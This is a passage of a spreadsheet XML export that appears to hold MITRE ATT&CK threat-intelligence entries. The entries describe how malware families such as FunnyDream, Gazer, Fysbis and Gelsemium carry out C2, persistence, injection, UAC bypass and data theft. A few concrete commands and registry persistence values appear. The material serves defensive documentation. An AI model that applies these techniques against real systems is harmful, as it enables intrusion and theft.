    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can retrieve token signing certificates and token decryption certificates from a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--6b2e4ea0-1d04-4cf5-8ca8-72b311e20737</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can enumerate all Common Language Runtimes (CLRs) and running Application Domains in the compromised AD FS server's &lt;code&gt;Microsoft.IdentityServer.ServiceHost.exe&lt;/code&gt; process.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--6d91c756-df9c-4fbe-9489-2cf6cf7ba206</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader has reflectively loaded .NET-based assembly/payloads into memory.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--dbeb509e-58a9-41f9-bd08-95b3b1075edf</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661)'s loader can call the &lt;code&gt;load()&lt;/code&gt; function to load the [FoggyWeb](https://attack.mitre.org/software/S0661) dll into an Application Domain on a compromised AD FS server.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--91d0f880-8928-4173-bb2f-518876a8c0b3</t>
  </si>
  <si>
    <t xml:space="preserve">[FoggyWeb](https://attack.mitre.org/software/S0661) has used a dynamic XOR key and custom XOR methodology for C2 communications.(Citation: MSTIC FoggyWeb September 2021)  </t>
  </si>
  <si>
    <t>relationship--e1e07e90-7012-4a38-82b4-e521ef21e8d9</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) can allow abuse of a compromised AD FS server's SAML token.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--6ee04a90-7158-43a6-8133-9b498f1fef2c</t>
  </si>
  <si>
    <t>[FoggyWeb](https://attack.mitre.org/software/S0661) has the ability to communicate with C2 servers over HTTP GET/POST requests.(Citation: MSTIC FoggyWeb September 2021)</t>
  </si>
  <si>
    <t>relationship--5c92055a-8396-4e60-9e1f-c95a028b902b</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to act on (ex: copy, move, etc.) files/directories in a system during (ex: copy files into a staging area before).(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>relationship--9420e9de-cc4c-4d5c-b40f-02c57dcc4fd9</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to locate certain types of files/directories in a system.(ex: locate all files with a specific extension, name, and/or age)(Citation: Überwachung APT28 Forfiles June 2015)</t>
  </si>
  <si>
    <t>relationship--9e235097-0a3a-410f-b3a1-ec50ea910d47</t>
  </si>
  <si>
    <t>[Forfiles](https://attack.mitre.org/software/S0193) can be used to subvert controls and possibly conceal command execution by not directly invoking [cmd](https://attack.mitre.org/software/S0106).(Citation: VectorSec ForFiles Aug 2017)(Citation: Evi1cg Forfiles Nov 2017)</t>
  </si>
  <si>
    <t>relationship--8b746637-fef8-474e-8960-822d758fb9b3</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can XOR credit card information before exfiltration.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>relationship--f4c346b3-91ec-4edc-a648-a6273c965e02</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can collect elements related to credit card data from process memory.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>relationship--7ccb94c2-fc46-464a-bd44-7c61b46cea5b</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can use DNS tunneling for exfiltration of credit card data.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>relationship--8f064578-a664-4d9e-a907-ec85ef5839b0</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\Windows\.(Citation: FireEye FIN6 April 2016)</t>
  </si>
  <si>
    <t>relationship--935d1918-a1ea-4c46-b3b0-5c1d0f44a346</t>
  </si>
  <si>
    <t>[FrameworkPOS](https://attack.mitre.org/software/S0503) can enumerate and exclude selected processes on a compromised host to speed execution of memory scraping.(Citation: SentinelOne FrameworkPOS September 2019)</t>
  </si>
  <si>
    <t>relationship--b72be1af-b4d0-4607-8f97-377d23ddbb36</t>
  </si>
  <si>
    <t>S0277</t>
  </si>
  <si>
    <t>FruitFly</t>
  </si>
  <si>
    <t>malware--4a98e44a-bd52-461e-af1e-a4457de87a36</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) executes and stores obfuscated Perl scripts.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--a7590c10-ba0a-453d-b086-1b3427e20462</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) will delete files on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--66a13868-e416-49d4-85ad-318f93f91a29</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) looks for specific files and file types.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--ddbbd283-6874-4348-82c7-98df6d59ac41</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) saves itself with a leading "." to make it a hidden file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--bd7dce44-be74-4d8e-b9e4-efcd77b8a29b</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) persists via a Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--e230326e-186e-490e-9299-fbc000d33d0a</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) has the ability to list processes on the system.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--112fec98-96be-4843-a56e-90d6b3fc02b2</t>
  </si>
  <si>
    <t>[FruitFly](https://attack.mitre.org/software/S0277) takes screenshots of the user's desktop.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--97a68907-3642-4f23-aeae-55ad5bbd7b86</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover application windows via execution of `EnumWindows`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fde8c63b-13e7-47d0-836f-f8b5291bf2bd</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</si>
  <si>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</si>
  <si>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relationship--d29ff57c-2821-45e9-94b5-beb62f63f8ea</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has compressed collected files with zLib.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--9b69f1c0-ba37-478a-a3b9-c97b02761aee</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can monitor files for changes and automatically collect them.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--8f7fe970-0a16-4007-84ae-e7294d06595f</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use com objects identified with `CLSID_ShellLink`(`IShellLink` and `IPersistFile`) and `WScript.Shell`(`RegWrite` method) to enable persistence mechanisms.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--30e3ae03-ffd2-4ad0-822c-018b08079dd9</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can send compressed and obfuscated packets to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--d0ce49aa-fc45-431a-8109-90958fb15b5e</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can upload files from victims' machines.(Citation: Bitdefender FunnyDream Campaign November 2020)(Citation: Kaspersky APT Trends Q1 2020)</t>
  </si>
  <si>
    <t>relationship--c8389b37-06ee-4cca-9f03-7ade85b1c681</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilePakMonitor component has the ability to collect files from removable devices.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--e6e4cb23-3c58-41d8-9583-9e10bff2b1d0</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can inject into the Bka.exe process using the `VirtualAllocEx`, `WriteProcessMemory` and `CreateRemoteThread` APIs to load the DLL component.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--44a97cbb-ce03-43ee-959e-c582e64372a2</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can execute commands, including gathering user information, and send the results to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--6ccbfb65-9be0-4b7c-947a-fb686e64985a</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can delete files including its dropper component.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fac15b17-554e-4f16-a131-abf5f703f6f9</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify files with .doc, .docx, .ppt, .pptx, .xls, .xlsx, and .pdf extensions and specific timestamps for collection.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fc268488-a74d-4100-917f-be04cc81826b</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to clean traces of malware deployment.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--b26f9867-37f2-4b7f-9b87-26f2152191bc</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can download additional files onto a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--9c2ed616-647a-4cf5-9f43-b0b78f9fdcd1</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) Keyrecord component can capture keystrokes.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--7b25dfb3-e1f5-4f75-94b3-a465e7f76cfb</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can stage collected information including screen captures and logged keystrokes locally.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--20b14e6f-685d-4b88-9ab7-40f7beb99ec4</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has used a service named `WSearch` for execution.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--60269020-6ab2-496a-9649-3b1cd707aced</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use Native API for defense evasion, discovery, and collection.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--bc70728d-9f56-43df-8580-1d22c829bd14</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can communicate with C2 over TCP and UDP.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--fc99ba1c-8782-4864-9009-77f8338cb3ed</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</si>
  <si>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</si>
  <si>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relationship--f106c0c2-b83c-44b2-ab93-161e325f6a42</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) FilepakMonitor component can detect removable drive insertion.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--1555866c-1eca-4de3-aded-d745fdd47d1c</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to discover processes, including `Bka.exe` and `BkavUtil.exe`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--5f7c7285-daa4-499d-b9d6-c1028e5148d4</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can connect to HTTP proxies via TCP to create a tunnel to C2.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--4d7080b8-a3e0-4122-b0c9-c1d9c2ba6890</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify and use configured proxies in a compromised network for C2 communication.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--93900b40-be44-48eb-92bc-c171a5ce5501</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can check `Software\Microsoft\Windows\CurrentVersion\Internet Settings` to extract the `ProxyServer` string.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--8db65d27-ddf4-4edd-9ccb-8112a78e9f47</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use a Registry Run Key and the Startup folder to establish persistence.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--0a606064-9f7f-4ca9-a2c5-b80360433ff7</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can collect information about hosts on the victim network.(Citation: Kaspersky APT Trends Q1 2020)</t>
  </si>
  <si>
    <t>relationship--74ef18b6-ca55-4fc3-acf1-10ed585c160f</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use `rundll32` for execution of its components.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--439e52b5-9aa1-4afb-b759-2b99b9fc5049</t>
  </si>
  <si>
    <t>The [FunnyDream](https://attack.mitre.org/software/S1044) ScreenCap component can take screenshots on a compromised host.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--91718be6-b03a-48fd-a1ab-a54d7148ffa2</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can identify the processes for Bkav antivirus.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--eb8508e4-6ebe-44bc-af58-b7b626bddeb8</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can enumerate all logical drives on a targeted machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--f13b18fe-1596-453f-8dba-43cfa848a5e7</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can parse the `ProxyServer` string in the Registry to discover http proxies.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--7e11e52f-e246-4752-a980-36ad2f7e82eb</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has the ability to gather user information from the targeted system using `whoami/upn&amp;whoami/fqdn&amp;whoami/logonid&amp;whoami/all`.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--82404260-b720-4f23-a162-81a9d6735c1e</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can check system time to help determine when changes were made to specified files.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--856ebcb0-cfec-484a-a741-900bb4d7f38a</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use `cmd.exe` for execution on remote hosts.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--ec06b018-fe67-49f0-976c-be5f7637b094</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) can use WMI to open a Windows command shell on a remote machine.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--0fc08710-fefb-4109-821e-1130c14914f3</t>
  </si>
  <si>
    <t>[FunnyDream](https://attack.mitre.org/software/S1044) has established persistence by running `sc.exe` and by setting the `WSearch` service to run automatically.(Citation: Bitdefender FunnyDream Campaign November 2020)</t>
  </si>
  <si>
    <t>relationship--0a1b48b9-2063-449d-a316-c6760267720f</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to delete files.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--7b7ea5f4-c504-49c6-ae43-12431191d54f</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has the ability to search for files.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>relationship--13b78b09-00b6-4307-87b7-7cd8c9360b39</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can perform keylogging.(Citation: Fysbis Palo Alto Analysis) </t>
  </si>
  <si>
    <t>relationship--1b023598-278c-4a0f-b058-4d169b51f45a</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as the rsyncd and dbus-inotifier services.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--2d0510d6-765b-4352-8ddc-36556831215b</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has masqueraded as trusted software rsyncd and dbus-inotifier.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--dedfdac6-c76b-4baa-99ca-3f0233141d2d</t>
  </si>
  <si>
    <t>12 September 2019</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) has been encrypted using XOR and RC4.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>relationship--53d441a4-d6ba-46b2-aa56-91b3f232c67a</t>
  </si>
  <si>
    <t xml:space="preserve">[Fysbis](https://attack.mitre.org/software/S0410) can collect information about running processes.(Citation: Fysbis Dr Web Analysis) </t>
  </si>
  <si>
    <t>relationship--3029d06e-7a13-4d17-bad5-ce3198bce2ef</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) can use Base64 to encode its C2 traffic.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--0edefa7f-0b1b-48b7-ab51-e0107b48c683</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has used the command &lt;code&gt;ls /etc | egrep -e"fedora\*|debian\*|gentoo\*|mandriva\*|mandrake\*|meego\*|redhat\*|lsb-\*|sun-\*|SUSE\*|release"&lt;/code&gt; to determine which Linux OS version is running.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>relationship--834bbbc7-33b7-41e4-9bc8-98401a5a0e36</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has established persistence using a systemd service.(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--8c9c075a-0c9a-45ef-a4cb-53095c2664a7</t>
  </si>
  <si>
    <t>[Fysbis](https://attack.mitre.org/software/S0410) has the ability to create and execute commands in a remote shell for CLI.(Citation: Fysbis Palo Alto Analysis)</t>
  </si>
  <si>
    <t>relationship--ff9e0633-9618-4616-a303-f9bb059f6289</t>
  </si>
  <si>
    <t>If executing without root privileges, [Fysbis](https://attack.mitre.org/software/S0410) adds a `.desktop` configuration file to the user's `~/.config/autostart` directory.(Citation: Red Canary Netwire Linux 2022)(Citation: Fysbis Dr Web Analysis)</t>
  </si>
  <si>
    <t>relationship--eed67968-2d71-4394-84a9-1240d9ba6a83</t>
  </si>
  <si>
    <t>[GLOOXMAIL](https://attack.mitre.org/software/S0026) communicates to servers operated by Google using the Jabber/XMPP protocol.(Citation: Mandiant APT1)(Citation: CyberESI GTALK)</t>
  </si>
  <si>
    <t>relationship--bb8149a2-fdda-4c3a-9e02-f530c4ee7962</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve Windows domain membership information.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--3a3efac5-1531-413b-97b7-e210b8880f05</t>
  </si>
  <si>
    <t xml:space="preserve">[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)	</t>
  </si>
  <si>
    <t>relationship--58801cab-349a-4f09-b449-149b19bcf085</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used PowerShell to execute the Meterpreter downloader TinyMet.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--f4315d71-e2aa-4039-acfa-c7737b1e8c86</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a persistence module that stores the implant inside the Registry, which executes at logon.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--bdbd9cce-7d32-4e87-8036-3e602a3783b9</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used &lt;code&gt;sctasks&lt;/code&gt; for persistence. (Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--d27b805a-3570-434e-9ac7-e37407a4dd8e</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a screenshot module that can be used to take a screenshot of the remote system.(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--06b747a6-a3d2-441e-9a24-b79491be3647</t>
  </si>
  <si>
    <t>[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve information about a victim's computer, including the resolution of the workstation .(Citation: SecureList Griffon May 2019)</t>
  </si>
  <si>
    <t>relationship--66bd7bd5-b53f-4791-a130-7278541f3fa7</t>
  </si>
  <si>
    <t xml:space="preserve">[GRIFFON](https://attack.mitre.org/software/S0417) has used a reconnaissance module that can be used to retrieve the date and time of the system.(Citation: SecureList Griffon May 2019)	</t>
  </si>
  <si>
    <t>relationship--3ce0fee3-3ad5-49b9-8213-871484674d93</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses RSA.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--2709cd56-6a75-487d-9b24-d931c053324a</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</si>
  <si>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</si>
  <si>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relationship--c354bbc0-74c4-4805-b6e6-f33f49272f86</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) has commands to delete files and persistence mechanisms from the victim.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--85c95ce3-8685-4d2a-9d6f-7e4be4cd9623</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can execute a task to download a file.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8db1b5bd-8f0c-4c13-8667-c83713ce799e</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) stores configuration items in alternate data streams (ADSs) if the Registry is not accessible.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--d2d11e48-91f9-4ebf-82b7-c194c0bee9b5</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) logs its actions into files that are encrypted with 3DES. It also uses RSA to encrypt resources.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--deb7df24-689e-4e4e-909f-a270241ab65a</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) injects its communication module into an Internet accessible process through which it performs C2.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--8acca861-11fd-49bd-8dbc-0b326f5303d6</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--2fb450c6-e236-4b81-b5ac-a9d4be0cf167</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a scheduled task.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--eb0307d6-901d-4140-84f9-a08c6a8ea14c</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence through the system screensaver by configuring it to execute the malware.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--b4f8c479-aab5-481d-aa04-922677da108a</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by creating a .lnk file in the Start menu or by modifying existing .lnk files to execute the malware through cmd.exe.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--7ec988a7-712a-45ae-b6b3-db26a6515b80</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) uses custom encryption for C2 that uses 3DES.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--a392aa7e-b3ce-477c-acfc-e0f6b1d38556</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) obtains the current user's security identifier.(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--d219ed2b-2877-450f-9a69-a30f36497d14</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) performs thread execution hijacking to inject its orchestrator into a running thread from a remote process.(Citation: ESET Gazer Aug 2017)(Citation: Securelist WhiteBear Aug 2017)</t>
  </si>
  <si>
    <t>relationship--86ebda8c-df0c-4d76-970b-27bf392606a7</t>
  </si>
  <si>
    <t>For early [Gazer](https://attack.mitre.org/software/S0168) versions, the compilation timestamp was faked.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--1dfbe8fe-0e7a-42a7-85f0-a94b086b470b</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) communicates with its C2 servers over HTTP.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--61047751-c353-4190-bc37-19ad959bc35e</t>
  </si>
  <si>
    <t>[Gazer](https://attack.mitre.org/software/S0168) can establish persistence by setting the value “Shell” with “explorer.exe, %malware_pathfile%” under the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon&lt;/code&gt;.(Citation: ESET Gazer Aug 2017)</t>
  </si>
  <si>
    <t>relationship--07f83a39-8bb0-44f1-9c81-7291ba10dd03</t>
  </si>
  <si>
    <t>S0666</t>
  </si>
  <si>
    <t>Gelsemium</t>
  </si>
  <si>
    <t>malware--efa7c4d6-8e30-41d9-a8fd-26dc337f4a1b</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use token manipulation to bypass UAC on Windows7 systems.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--ba218c07-3cde-4555-a150-0c8daff51cee</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use junk code to hide functions and evade detection.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--e1d0aa1d-c1ce-4cbc-bed2-097d6ea256c4</t>
  </si>
  <si>
    <t>30 November 2021</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can bypass UAC to elevate process privileges on a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--1762eb59-4fc3-46c8-87d2-c16128bf20cb</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use the `IARPUinstallerStringLauncher` COM interface are part of its UAC bypass process.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--fa939612-0aa1-40b6-aab6-7a1b1872c93b</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to use DNS in communication with C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--70c0fd33-8091-4e58-896b-0be55429ee91</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can collect data from a compromised host.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--a2c1921d-3d5d-4ec7-ab4d-4fe2e7d19e64</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can decompress and decrypt DLLs and shellcode.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--09e94c75-2a53-4f13-a290-a4acf5dd4e71</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) can use dynamic DNS domain names in C2.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--0869b511-3211-4f90-86fa-d145fa42cc3a</t>
  </si>
  <si>
    <t>[Gelsemium](https://attack.mitre.org/software/S0666) has the ability to inject DLLs into specific processes.(Citation: ESET Gelsemium June 2021)</t>
  </si>
  <si>
    <t>relationship--a737a968-1fec-4e9b-b0dd-d4318f07a691</t>
  </si>
